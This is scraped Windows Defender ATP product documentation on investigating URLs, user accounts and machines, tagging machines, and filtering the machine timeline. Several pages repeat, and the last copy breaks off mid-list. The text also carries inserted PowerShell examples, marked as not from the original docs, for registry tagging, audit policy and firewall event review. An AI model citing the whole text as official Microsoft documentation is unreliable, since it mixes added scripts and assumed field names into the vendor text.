You can see information from the following sections in the URL view:
URL details, Contacts, Nameservers
Alerts related to this URL
URL in organization
Most recent observed machines with URL

URL Worldwide
The URL details, contacts, and nameservers sections display various attributes about the URL.

Alerts related to this URL


The Alerts related to this URL section provides a list of alerts that are associated with the URL.

URL in organization
The URL in organization section provides details on the prevalence of the URL in the organization.

Most recent observed machines with URL


The Most recent observed machines with URL section provides a chronological view of the events and
associated alerts that were observed for the URL.
Investigate a domain:
1. Select URL from the Search bar drop-down menu.
2. Enter the URL in the Search field.
3. Click the search icon or press Enter. Details about the URL are displayed. Note: search results will only be
returned for URLs observed in communications from machines in the organization.
4. Use the search filters to define the search criteria. You can also use the timeline search box to filter the
displayed results of all machines in the organization observed communicating with the URL, the file
associated with the communication and the last date observed.
5. Clicking any of the machine names will take you to that machine's view, where you can continue investigating
reported alerts, behaviors, and events.

Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate machines in the Windows Defender ATP Machines list
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Investigate a user account in Windows Defender ATP
4/5/2019 • 3 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Investigate user account entities


Identify user accounts with the most active alerts (displayed on the dashboard as "Users at risk") and investigate
cases of potentially compromised credentials, or pivot on the associated user account when investigating an alert
or machine to identify possible lateral movement between machines with that user account.
You can find user account information in the following views:
Dashboard
Alert queue
Machine details page
A clickable user account link is available in these views that takes you to the user account details page, where
more details about the user account are shown.
When you investigate a user account entity, you'll see:
User account details, Azure Advanced Threat Protection (Azure ATP) alerts, and Logged on machines
Alerts related to this user
Observed in organization (machines logged on to)

User details
The user account entity details, Azure ATP alerts, and logged on machines sections display various attributes
about the user account.
The user entity tile provides details about the user such as when the user was first and last seen. Depending on
the integration features you enable, you'll see other details. For example, if you enable the Skype for business
integration, you'll be able to contact the user from the portal.
Azure Advanced Threat Protection
If you have enabled the Azure ATP feature and there are alerts related to the user, you can click on the link that
will take you to the Azure ATP page, where more information about the alerts is provided. The Azure ATP tile
also provides details such as the last AD site, total group memberships, and login failures associated with the
user.

NOTE
You'll need to enable the integration on both Azure ATP and Windows Defender ATP to use this feature. In Windows
Defender ATP, you can enable this feature in advanced features. For more information on how to enable advanced
features, see Turn on advanced features.

Logged on machines
You'll also see a list of the machines that the user logged on to, and can expand these to see details of the logon
events on each machine.

Alerts related to this user


This section provides a list of alerts that are associated with the user account. This list is a filtered view of the
Alert queue, and shows alerts where the user context is the selected user account, the date when the last
activity was detected, a short description of the alert, the machine associated with the alert, the alert's severity,
the alert's status in the queue, and who is assigned the alert.

Observed in organization
This section allows you to specify a date range to see a list of machines that this user was observed logged on
to, together with the most frequent and least frequent logged on user account on each of these machines.
The machine health state is displayed in the machine icon and color as well as in a description text. Clicking on
the icon displays additional details regarding machine health.

Search for specific user accounts


1. Select User from the Search bar drop-down menu.
2. Enter the user account in the Search field.
3. Click the search icon or press Enter.
A list of users matching the query text is displayed. You'll see the user account's domain and name, when the
user account was last seen, and the total number of machines it was observed logged on to in the last 30 days.
You can filter the results by the following time periods:
1 day
3 days
7 days
30 days
6 months

Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate machines in the Windows Defender ATP Machines list
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
View and organize the Windows Defender ATP Machines list
4/5/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

The Machines list shows a list of the machines in your network where alerts were generated. By default, the
queue displays machines with alerts seen in the last 30 days.
At a glance you'll see information such as domain, risk level, OS platform, and other details.
There are several options you can choose from to customize the machines list view. On the top navigation you can:
Customize columns to add or remove columns
Export the entire list in CSV format
Select the items to show per page
Navigate between pages
Apply filters
Use the machine list in these main scenarios:
During onboarding
During the onboarding process, the Machines list is gradually populated with machines as they begin to
report sensor data. Use this view to track your onboarded endpoints as they come online. Sort and filter by
time of last report, Active malware category, or Sensor health state, or download the complete
endpoint list as a CSV file for offline analysis.

NOTE
Exporting the list might take a significant amount of time, depending on the number of machines in your
organization. Exporting the list in CSV format produces the data unfiltered: the CSV file will include all
machines in the organization, regardless of any filtering applied in the view itself.

Day-to-day work
The list enables easy identification of the machines most at risk at a glance. High-risk machines have the
greatest number and highest-severity alerts. Sorting machines by Active alerts helps identify the most
vulnerable machines so you can take action on them.
Sort and filter the machine list
You can apply the following filters to limit the list of machines and get a more focused view.
Risk level
Machine risk levels are indicators of the active threats that machines could be exposed to. A machine's risk level is
determined using the number of active alerts and their severity levels. You can influence a machine's risk level by
resolving associated alerts manually or automatically and also by suppressing an alert.
OS Platform
Limit the Machines list view by selecting the OS platform that you're interested in investigating.
Health state
Filter the list to view specific machines grouped together by the following machine health states:
Active – Machines that are actively reporting sensor data to the service.
Misconfigured – Machines that have impaired communications with the service or are unable to send sensor
data. Misconfigured machines can be further classified as:
No sensor data
Impaired communications
For more information on how to address issues on misconfigured machines, see Fix unhealthy sensors.
Inactive – Machines that have completely stopped sending signals for more than 7 days.
Security state
Filter the list to view specific machines that are well configured or require attention based on the Windows
Defender security controls that are enabled in your organization.
Well configured - Machines have the Windows Defender security controls well configured.
Requires attention - Machines where improvements can be made to increase the overall security posture of
your organization.
For more information, see View the Secure Score dashboard.
Tags
You can filter the list based on the grouping and tagging that you've added to individual machines.

Related topics
Investigate machines in the Windows Defender ATP Machines list
Create and manage machine tags
4/5/2019 • 2 minutes to read • Edit Online

Add tags on machines to create a logical group affiliation. Machine group affiliation can represent geographic
location, specific activity, importance level and others.
You can create machine groups in the context of role-based access control (RBAC) to control who can take specific action or
who can see information on a specific machine group or groups by assigning the machine group to a user group.
For more information, see Manage portal access using role-based access control.
You can also use machine groups to assign specific remediation levels to apply during automated investigations.
For more information, see Create and manage machine groups.
In an investigation, you can filter the Machines list to just specific machine groups by using the Groups filter.
Machine tags support proper mapping of the network, enabling you to attach different tags to capture context and
to enable dynamic list creation as part of an incident.
You can add tags on machines using the following ways:
By setting a registry key value
By using the portal

Add machine tags by setting a registry key value


Add tags on machines which can be used as a filter in Machines list view. You can limit the machines in the list by
selecting the Tag filter on the Machines list.

NOTE
Applicable only on the following machines:
Windows 10, version 1709 or later
Windows Server, version 1803 or later
Windows Server 2016
Windows Server 2012 R2

Machines with similar tags can be handy when you need to apply contextual action on a specific list of machines.
Use the following registry key entry to add a tag on a machine:
Registry key: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging\
Registry key value (string): Group

NOTE
The device tag is part of the machine information report that's generated once a day. As an alternative, you may choose to
restart the endpoint, which sends a new machine information report.
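The registry entry above is usually set by policy or a deployment script rather than by hand. The following PowerShell, added here as an example and not part of the original documentation, writes the tag to the key and value name the documentation lists and reads it back to confirm, so it can be used as the body of a deployment task. It assumes an elevated session on a supported OS (see the note above); the tag value Finance-EMEA is a constructed example.

```powershell
# Added example (not from the original documentation): set the device tag
# through the registry key the documentation lists, then verify it.
# Requires an elevated (Administrator) PowerShell session.

# Key and value name exactly as given in the documentation.
$keyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging'
$tag     = 'Finance-EMEA'   # constructed example tag

# Create the key (and any missing parent keys) if it does not exist yet.
if (-not (Test-Path -Path $keyPath)) {
    New-Item -Path $keyPath -Force | Out-Null
}

# Write the REG_SZ value named 'Group'. Set-ItemProperty creates the value
# if it is missing and overwrites it otherwise; -Type String makes it REG_SZ.
Set-ItemProperty -Path $keyPath -Name 'Group' -Value $tag -Type String

# Read it back and fail loudly if the write did not take effect.
$current = (Get-ItemProperty -Path $keyPath -Name 'Group').Group
if ($current -ne $tag) {
    throw "Device tag was not written: expected '$tag', found '$current'"
}
Write-Host "Device tag set to '$current'. It is reported with the next daily machine information report, or after a restart of the endpoint."

# To remove the tag again, delete the value (the sensor reports the change the same way):
# Remove-ItemProperty -Path $keyPath -Name 'Group'
```

Because the tag only reaches the portal with the next machine information report, a deployment that verifies the registry value locally will still see a delay before the Tags filter in the Machines list reflects it.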

Add machine tags using the portal


Dynamic context capturing is achieved using tags. By tagging machines, you can keep track of individual machines
in your organization. After adding tags on machines, you can apply the Tags filter on the Machines list to get a
narrowed list of machines with the tag.
1. Select the machine that you want to manage tags on. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
You can also get to the alert page through the file and IP views.
2. Open the Actions menu and select Manage tags.

3. Enter tags on the machine. To add more tags, click the + icon.
4. Click Save and close.
Tags are added to the machine view and will also be reflected on the Machines list view. You can then use
the Tags filter to see the relevant list of machines.
Manage machine tags
You can manage tags from the Actions button or by selecting a machine from the Machines list and opening the
machine details panel.
Add machine tags using APIs
For more information, see Add or remove machine tags API.
Investigate machines in the Windows Defender ATP
Machines list
4/5/2019 • 7 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Investigate machines
Investigate the details of an alert raised on a specific machine to identify other behaviors or events that might be
related to the alert or the potential scope of breach.
You can click on affected machines whenever you see them in the portal to open a detailed report about that
machine. Affected machines are identified in the following areas:
The Machines list
The Alerts queue
The Security operations dashboard
Any individual alert
Any individual file details view
Any IP address or domain details view
When you investigate a specific machine, you'll see:
Machine details, Logged on users, Machine risk, and Machine Reporting
Alerts related to this machine
Machine timeline

The machine details, logged on users, machine risk, and machine reporting sections display various attributes
about the machine.
Machine details
The machine details tile provides information such as the domain and OS of the machine. If there's an investigation
package available on the machine, you'll see a link that allows you to download the package.
For more information on how to take action on a machine, see Take response action on a machine.
Logged on users
Clicking on the logged on users in the Logged on users tile opens the Users Details pane that displays the following
information for logged on users in the past 30 days:
Interactive and remote interactive logins
Network, batch, and system logins

You'll also see details such as logon types for each user account, the user group, and when the account logon
occurred.
For more information, see Investigate user entities.
Machine risk
The Machine risk tile shows the overall risk assessment of a machine. A machine's risk level can be determined
using the number of active alerts or by a combination of multiple risks that may increase the risk assessment and
their severity levels. You can influence a machine's risk level by resolving associated alerts manually or
automatically and also by suppressing an alert. It's also indicators of the active threats that machines could be
exposed to.
Azure Advanced Threat Protection
If you have enabled the Azure ATP feature and there are alerts related to the machine, you can click on the link that
will take you to the Azure ATP page where more information about the alerts are provided.

NOTE
You'll need to enable the integration on both Azure ATP and Windows Defender ATP to use this feature. In Windows Defender
ATP, you can enable this feature in advanced features. For more information on how to enable advanced features, see Turn on
advanced features.

Machine reporting
Provides the last internal IP and external IP of the machine. It also shows when the machine was first and last seen
reporting to the service.

Alerts related to this machine


The Alerts related to this machine section provides a list of alerts that are associated with the machine. You can
also manage alerts from this section by clicking the circle icons to the left of the alert (or using Ctrl or Shift + click
to select multiple alerts).
This list is a filtered version of the Alerts queue, and shows the date when the alert's last activity was detected, a
short description of the alert, the user account associated with the alert, the alert's severity, the alert's status in the
queue, and who is addressing the alert.
You can also choose to highlight an alert from the Alerts related to this machine or from the Machine timeline
section to see the correlation between the alert and its related events on the machine by right-clicking on the alert
and selecting Select and mark events. This highlights the alert and its related events and helps distinguish them
from other alerts and events appearing in the timeline. Highlighted events are displayed in all information levels
whether you choose to view the timeline by Detections, Behaviors, or Verbose.

Machine timeline
The Machine timeline section provides a chronological view of the events and associated alerts that have been
observed on the machine.
This feature also enables you to selectively drill down into events that occurred within a given time period. You can
view the temporal sequence of events that occurred on a machine over a selected time period.

Windows Defender ATP monitors and captures suspicious or anomalous behavior on Windows 10 machines and
displays the process tree flow in the Machine timeline. This gives you better context of the behavior which can
contribute to understanding the correlation between events, files, and IP addresses in relation to the machine.
Search for specific events
Use the search bar to look for specific timeline events. Harness the power of using the following defined search
queries based on type:value pairs and event filter types to sift through the search results:
Value - Type in any search keyword to filter the timeline with the attribute you’re searching for. This search
supports defined search queries based on type:value pairs.
You can use any of the following values:
Hash: Sha1 or MD5
File name
File extension
Path
Command line
User
IP
URL
Informational level – Click the drop-down button to filter by the following levels:
Detections mode: displays Windows ATP Alerts and detections
Behaviors mode: displays "detections" and selected events of interest
Verbose mode: displays all raw events without aggregation or filtering
Event type - Click the drop-down button to filter by events such as Windows - Windows Defender ATP
alerts, Windows Defender Application Guard events, registry events, file events, and others.
Filtering by event type allows you to define precise queries so that you see events with a specific focus. For
example, you can search for a file name, then filter the results to only see Process events matching the search
criteria or to only view file events, or even better: to view only network events over a period of time to make
sure no suspicious outbound communications go unnoticed.

NOTE
For firewall events to be displayed, you'll need to enable the audit policy, see Audit Filtering Platform connection. Firewall
covers the following events:
5025 - firewall service stopped
5031 - application blocked from accepting incoming connections on the network
5157 - blocked connection

User account – Click the drop-down button to filter the machine timeline by the following user associated
events:
Logon users
System
Network
Local service
The following example illustrates the use of type:value pair. The events were filtered by searching for the user
jonathan.wolcott and network events as the event type:

The results in the timeline only show network communication events run in the defined user context.
Filter events from a specific date
Use the time-based slider to filter events from a specific date. By default, the machine timeline is set to display the
events of the current day.
Using the slider updates the listed alerts to the date that you select. Displayed events are filtered from that date and
older.
The slider is helpful when you're investigating a particular alert on a machine. You can navigate from the Alerts
view and click on the machine associated with the alert to jump to the specific date when the alert was observed,
enabling you to investigate the events that took place around the alert.
Export machine timeline events
You can also export detailed event data from the machine timeline to conduct offline analysis. You can choose to
export the machine timeline for the current date or specify a date range. You can export up to seven days of data
and specify the specific time between the two dates.

Navigate between pages
Use the events per page drop-down to choose the number of events you'd like to see on the page. You can choose to
display 20, 50, or 100 events per page. You can also move between pages by clicking Older or Newer.
From the Machines list, you can also navigate to the file, IP, or URL view; the timeline associated with an alert
is retained, helping you view the investigation from different angles and keep the context of the event timeline.
From the list of events displayed in the timeline, you can examine the behaviors or events to help identify
indicators of interest such as files and IP addresses and determine the scope of a breach. You can then use that
information to respond to events and keep your system secure.

You can also use the Artifact timeline feature to see the correlation between alerts and events on a specific machine.
Expand an event to view the processes associated with it. Click on the circle next to any process or IP
address in the process tree to investigate additional details of the identified processes. This action brings up the
Details pane, which includes the execution context of processes, network communications, and a summary of
metadata on the file or IP address.
The details pane enriches the ‘in-context’ information across investigation and exploration activities, reducing the
need to switch between contexts. It lets you focus on the task of tracing associations between attributes without
leaving the current context.

Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Investigate machines in the Windows Defender ATP Machines list
4/5/2019 • 7 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Investigate machines
Investigate the details of an alert raised on a specific machine to identify other behaviors or events that might be
related to the alert or the potential scope of breach.
You can click on affected machines whenever you see them in the portal to open a detailed report about that
machine. Affected machines are identified in the following areas:
The Machines list
The Alerts queue
The Security operations dashboard
Any individual alert
Any individual file details view
Any IP address or domain details view
When you investigate a specific machine, you'll see:
Machine details, Logged on users, Machine risk, and Machine Reporting
Alerts related to this machine
Machine timeline

The machine details, logged on users, machine risk, and machine reporting sections display various attributes
about the machine.
Machine details
The machine details tile provides information such as the domain and OS of the machine. If there's an investigation
package available on the machine, you'll see a link that allows you to download the package.
For more information on how to take action on a machine, see Take response action on a machine.
Logged on users
Clicking on the logged on users in the Logged on users tile opens the Users Details pane that displays the following
information for logged on users in the past 30 days:
Interactive and remote interactive logins
Network, batch, and system logins

You'll also see details such as logon types for each user account, the user group, and when the account logon
occurred.
For more information, see Investigate user entities.
Machine risk
The Machine risk tile shows the overall risk assessment of a machine. A machine's risk level is determined
by the number of active alerts, or by a combination of several risks whose severity levels together raise the
assessment. You can influence a machine's risk level by resolving associated alerts, manually or
automatically, and also by suppressing an alert. The risk level also indicates the active threats that the machine
could be exposed to.
Azure Advanced Threat Protection
If you have enabled the Azure ATP feature and there are alerts related to the machine, you can click on the link that
takes you to the Azure ATP page, where more information about the alerts is provided.

NOTE
You'll need to enable the integration on both Azure ATP and Windows Defender ATP to use this feature. In Windows Defender
ATP, you can enable this feature in advanced features. For more information on how to enable advanced features, see Turn on
advanced features.

Machine reporting
Provides the last internal IP and external IP of the machine. It also shows when the machine was first and last seen
reporting to the service.

Alerts related to this machine


The Alerts related to this machine section provides a list of alerts that are associated with the machine. You can
also manage alerts from this section by clicking the circle icons to the left of the alert (or using Ctrl or Shift + click
to select multiple alerts).
This list is a filtered version of the Alerts queue, and shows the date when the alert's last activity was detected, a
short description of the alert, the user account associated with the alert, the alert's severity, the alert's status in the
queue, and who is addressing the alert.
You can also choose to highlight an alert from the Alerts related to this machine or from the Machine timeline
section to see the correlation between the alert and its related events on the machine by right-clicking on the alert
and selecting Select and mark events. This highlights the alert and its related events and helps distinguish them
from other alerts and events appearing in the timeline. Highlighted events are displayed in all information levels
whether you choose to view the timeline by Detections, Behaviors, or Verbose.

Machine timeline
The Machine timeline section provides a chronological view of the events and associated alerts that have been
observed on the machine.
This feature also enables you to selectively drill down into events that occurred within a given time period. You can
view the temporal sequence of events that occurred on a machine over a selected time period.

Windows Defender ATP monitors and captures suspicious or anomalous behavior on Windows 10 machines and
displays the process tree flow in the Machine timeline. This gives you better context for the behavior, which helps
you understand the correlation between events, files, and IP addresses on the machine.
Search for specific events
Use the search bar to look for specific timeline events. Use the following search queries, based on type:value
pairs and event filter types, to sift through the search results:
Value - Type in any search keyword to filter the timeline by the attribute you're searching for. This search
supports defined search queries based on type:value pairs.
You can use any of the following values:
Hash: SHA1 or MD5
File name
File extension
Path
Command line
User
IP
URL
Informational level – Click the drop-down button to filter by the following levels:
Detections mode: displays Windows Defender ATP alerts and detections
Behaviors mode: displays "detections" and selected events of interest
Verbose mode: displays all raw events without aggregation or filtering
Event type - Click the drop-down button to filter by events such as Windows Defender ATP alerts, Windows
Defender Application Guard events, registry events, file events, and others.
Filtering by event type allows you to define precise queries so that you see events with a specific focus. For
example, you can search for a file name, then filter the results to only see Process events matching the search
criteria or to only view file events, or even better: to view only network events over a period of time to make
sure no suspicious outbound communications go unnoticed.

NOTE
For firewall events to be displayed, you'll need to enable the audit policy, see Audit Filtering Platform connection. Firewall
covers the following events:
5025 - firewall service stopped
5031 - application blocked from accepting incoming connections on the network
5157 - blocked connection

User account – Click the drop-down button to filter the machine timeline by the following user-associated
events:
Logon users
System
Network
Local service
The following example illustrates the use of a type:value pair. The events were filtered by searching for the user
jonathan.wolcott and selecting network events as the event type:

The results in the timeline only show network communication events run in the defined user context.
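The note above says firewall events only reach the timeline once the Filtering Platform Connection audit policy is on, but it does not show how to turn it on or how to confirm that 5025, 5031 and 5157 are actually being written. The following PowerShell is an added example (not code from the Windows Defender ATP documentation) that enables the subcategory on an endpoint, verifies the setting, and reads those three event IDs from the local Security log, grouping blocked outbound connections by application as a local check before relying on the portal view. The 24-hour window, the output columns and the use of the 5157 EventData field names and direction tokens are my assumptions for this example.

```powershell
# Added example (not from the Windows Defender ATP docs): make sure the
# Filtering Platform Connection audit subcategory is enabled so that
# Windows Firewall events 5025, 5031 and 5157 land in the Security log,
# then read them back locally. Run from an elevated PowerShell prompt.

# 1. Enable success and failure auditing for the subcategory. auditpol is
#    the built-in audit policy tool; the name matches the entry under
#    Object Access in Local Security Policy.
auditpol /set /subcategory:"Filtering Platform Connection" /success:enable /failure:enable

# 2. Confirm the effective setting.
auditpol /get /subcategory:"Filtering Platform Connection"

# 3. Pull the three firewall event IDs the timeline covers. The 24-hour
#    window is an assumption for this example; widen it as needed.
$since = (Get-Date).AddHours(-24)
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 5025, 5031, 5157
    StartTime = $since
} -ErrorAction SilentlyContinue

# 4. Flatten each 5157 (blocked connection) event into a row. The field
#    names come from the 5157 EventData schema; %%14593 is the token the
#    event uses for the Outbound direction (%%14592 is Inbound).
$blocked = foreach ($e in ($events | Where-Object Id -eq 5157)) {
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    [pscustomobject]@{
        Time        = $e.TimeCreated
        Application = $d['Application']
        Direction   = if ($d['Direction'] -eq '%%14593') { 'Outbound' } else { 'Inbound' }
        Destination = "$($d['DestAddress']):$($d['DestPort'])"
        Protocol    = $d['Protocol']      # IANA protocol number, e.g. 6 = TCP, 17 = UDP
        ProcessId   = $d['ProcessID']
    }
}

# 5. Service-stopped (5025) and listener-blocked (5031) events, oldest first.
$events | Where-Object { $_.Id -in 5025, 5031 } |
    Sort-Object TimeCreated |
    Format-Table TimeCreated, Id, Message -AutoSize

# 6. Blocked outbound connections grouped by application: the same
#    "no suspicious outbound communication goes unnoticed" check the
#    page describes, done against the local log.
$blocked | Where-Object Direction -eq 'Outbound' |
    Group-Object Application | Sort-Object Count -Descending |
    Format-Table Count, Name -AutoSize
```

Audit settings pushed by Group Policy override the local auditpol change, so on domain-joined machines step 2 is the check that matters: if the subcategory still reports No Auditing after step 1, the policy has to be set in the GPO instead.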
Filter events from a specific date
Use the time-based slider to filter events from a specific date. By default, the machine timeline is set to display the
events of the current day.
Using the slider updates the listed alerts to the date that you select. Displayed events are filtered from that date and
older.
The slider is helpful when you're investigating a particular alert on a machine. You can navigate from the Alerts
view and click on the machine associated with the alert to jump to the specific date when the alert was observed,
enabling you to investigate the events that took place around the alert.
Export machine timeline events
You can also export detailed event data from the machine timeline to conduct offline analysis. You can choose to
export the machine timeline for the current date or specify a date range. You can export up to seven days of data
and specify the time range between the two dates.
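Once the timeline has been exported, the three filters described above (a type:value search such as user:jonathan.wolcott, an event type, and the date slider's "that date and older" rule) can be applied to the file offline. The following PowerShell function is an added example, not part of the Windows Defender ATP documentation or the product: the CSV column names (Time, EventType, User, Process, Details) and the rows are constructed for the example, so the $typeToColumn table has to be mapped onto the headers of a real export before use.

```powershell
# Added example (not from the Windows Defender ATP docs): reproduce the
# timeline's type:value search, event-type filter and date slider against an
# exported timeline so triage can be repeated offline. Column names and rows
# below are constructed; a real export is loaded with Import-Csv instead.

$timelineCsv = @'
Time,EventType,User,Process,Details
2019-04-04 08:12:03,ProcessEvent,jonathan.wolcott,outlook.exe,started
2019-04-04 08:12:09,NetworkEvent,jonathan.wolcott,outlook.exe,203.0.113.7:443
2019-04-04 09:40:41,NetworkEvent,SYSTEM,svchost.exe,198.51.100.22:80
2019-04-05 10:05:18,NetworkEvent,jonathan.wolcott,powershell.exe,203.0.113.9:8080
2019-04-05 10:05:20,FileEvent,jonathan.wolcott,powershell.exe,C:\Users\jw\AppData\Local\Temp\a.exe
2019-04-06 07:00:00,NetworkEvent,jonathan.wolcott,chrome.exe,192.0.2.5:443
'@
$events = $timelineCsv | ConvertFrom-Csv

# Which export column each type prefix of a type:value query searches.
# Assumed mapping for the constructed columns above.
$typeToColumn = @{
    'user'         = 'User'
    'file name'    = 'Process'
    'ip'           = 'Details'
    'path'         = 'Details'
    'command line' = 'Details'
}

function Select-TimelineEvents {
    param(
        [object[]]$Events,
        [string]$Query,                                   # 'user:jonathan.wolcott'; plain text searches every column
        [string]$EventType,                               # 'NetworkEvent'; empty means all event types
        [datetime]$OnOrBefore = [datetime]::MaxValue      # slider semantics: that date and older
    )
    $Events | Where-Object {
        $e = $_
        # Date slider: keep events on the selected day and older.
        $timeOk = ([datetime]$e.Time).Date -le $OnOrBefore.Date
        # Event type drop-down.
        $typeOk = (-not $EventType) -or ($e.EventType -eq $EventType)
        # Search bar: type:value pair if present, otherwise a free-text match.
        $queryOk = $true
        if ($Query) {
            if ($Query -match '^(?<type>[^:]+):(?<value>.+)$') {
                $column  = $typeToColumn[$Matches.type.ToLower()]
                $queryOk = $column -and ($e.$column -like "*$($Matches.value)*")
            } else {
                $queryOk = ($e.PSObject.Properties.Value -join ' ') -like "*$Query*"
            }
        }
        $timeOk -and $typeOk -and $queryOk
    }
}

# The example from this page: user jonathan.wolcott with network events only.
Select-TimelineEvents -Events $events -Query 'user:jonathan.wolcott' -EventType 'NetworkEvent' |
    Format-Table Time, Process, Details -AutoSize

# The same search with the slider set to 5 April 2019, so later events drop out.
Select-TimelineEvents -Events $events -Query 'user:jonathan.wolcott' -EventType 'NetworkEvent' -OnOrBefore (Get-Date '2019-04-05') |
    Format-Table Time, Process, Details -AutoSize

# Free-text search across every column, as the search bar does without a type prefix.
Select-TimelineEvents -Events $events -Query '203.0.113' |
    Format-Table Time, EventType, User, Details -AutoSize
```

Unknown type prefixes return nothing rather than falling back to a free-text match, which mirrors the portal's behaviour of only honouring the defined types; extend $typeToColumn if your export carries separate hash, extension or URL columns.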

Navigate between pages
Use the events per page drop-down to choose the number of events you'd like to see on the page. You can choose to
display 20, 50, or 100 events per page. You can also move between pages by clicking Older or Newer.
From the Machines list, you can also navigate to the file, IP, or URL view; the timeline associated with an alert
is retained, helping you view the investigation from different angles and keep the context of the event timeline.
From the list of events displayed in the timeline, you can examine the behaviors or events to help identify
indicators of interest such as files and IP addresses and determine the scope of a breach. You can then use that
information to respond to events and keep your system secure.

You can also use the Artifact timeline feature to see the correlation between alerts and events on a specific machine.
Expand an event to view the processes associated with it. Click on the circle next to any process or IP
address in the process tree to investigate additional details of the identified processes. This action brings up the
Details pane, which includes the execution context of processes, network communications, and a summary of
metadata on the file or IP address.
The details pane enriches the ‘in-context’ information across investigation and exploration activities, reducing the
need to switch between contexts. It lets you focus on the task of tracing associations between attributes without
leaving the current context.

Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Investigate machines in the Windows Defender ATP
Machines list
4/5/2019 • 7 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Investigate machines
Investigate the details of an alert raised on a specific machine to identify other behaviors or events that might be
related to the alert or the potential scope of breach.
You can click on affected machines whenever you see them in the portal to open a detailed report about that
machine. Affected machines are identified in the following areas:
The Machines list
The Alerts queue
The Security operations dashboard
Any individual alert
Any individual file details view
Any IP address or domain details view
When you investigate a specific machine, you'll see:
Machine details, Logged on users, Machine risk, and Machine Reporting
Alerts related to this machine
Machine timeline

The machine details, logged on users, machine risk, and machine reporting sections display various attributes
about the machine.
Machine details
The machine details tile provides information such as the domain and OS of the machine. If there's an investigation
package available on the machine, you'll see a link that allows you to download the package.
For more information on how to take action on a machine, see Take response action on a machine.
Logged on users
Clicking on the logged on users in the Logged on users tile opens the Users Details pane that displays the following
information for logged on users in the past 30 days:
Interactive and remote interactive logins
Network, batch, and system logins

You'll also see details such as logon types for each user account, the user group, and when the account logon
occurred.
For more information, see Investigate user entities.
Machine risk
The Machine risk tile shows the overall risk assessment of a machine. A machine's risk level can be determined
using the number of active alerts or by a combination of multiple risks that may increase the risk assessment and
their severity levels. You can influence a machine's risk level by resolving associated alerts manually or
automatically and also by suppressing an alert. It's also indicators of the active threats that machines could be
exposed to.
Azure Advanced Threat Protection
If you have enabled the Azure ATP feature and there are alerts related to the machine, you can click on the link that
will take you to the Azure ATP page where more information about the alerts are provided.

NOTE
You'll need to enable the integration on both Azure ATP and Windows Defender ATP to use this feature. In Windows Defender
ATP, you can enable this feature in advanced features. For more information on how to enable advanced features, see Turn on
advanced features.

Machine reporting
Provides the last internal IP and external IP of the machine. It also shows when the machine was first and last seen
reporting to the service.

Alerts related to this machine


The Alerts related to this machine section provides a list of alerts that are associated with the machine. You can
also manage alerts from this section by clicking the circle icons to the left of the alert (or using Ctrl or Shift + click
to select multiple alerts).
This list is a filtered version of the Alerts queue, and shows the date when the alert's last activity was detected, a
short description of the alert, the user account associated with the alert, the alert's severity, the alert's status in the
queue, and who is addressing the alert.
You can also choose to highlight an alert from the Alerts related to this machine or from the Machine timeline
section to see the correlation between the alert and its related events on the machine by right-clicking on the alert
and selecting Select and mark events. This highlights the alert and its related events and helps distinguish them
from other alerts and events appearing in the timeline. Highlighted events are displayed in all information levels
whether you choose to view the timeline by Detections, Behaviors, or Verbose.

Machine timeline
The Machine timeline section provides a chronological view of the events and associated alerts that have been
observed on the machine.
This feature also enables you to selectively drill down into events that occurred within a given time period. You can
view the temporal sequence of events that occurred on a machine over a selected time period.

Windows Defender ATP monitors and captures suspicious or anomalous behavior on Windows 10 machines and
displays the process tree flow in the Machine timeline. This gives you better context of the behavior which can
contribute to understanding the correlation between events, files, and IP addresses in relation to the machine.
Search for specific events
Use the search bar to look for specific timeline events. Harness the power of using the following defined search
queries based on type:value pairs and event filter types to sift through the search results:
Value - Type in any search keyword to filter the timeline with the attribute you’re searching for. This search
supports defined search queries based on type:value pairs.
You can use any of the following values:
Hash: Sha1 or MD5
File name
File extension
Path
Command line
User
IP
URL
Informational level – Click the drop-down button to filter by the following levels:
Detections mode: displays Windows ATP Alerts and detections
Behaviors mode: displays "detections" and selected events of interest
Verbose mode: displays all raw events without aggregation or filtering
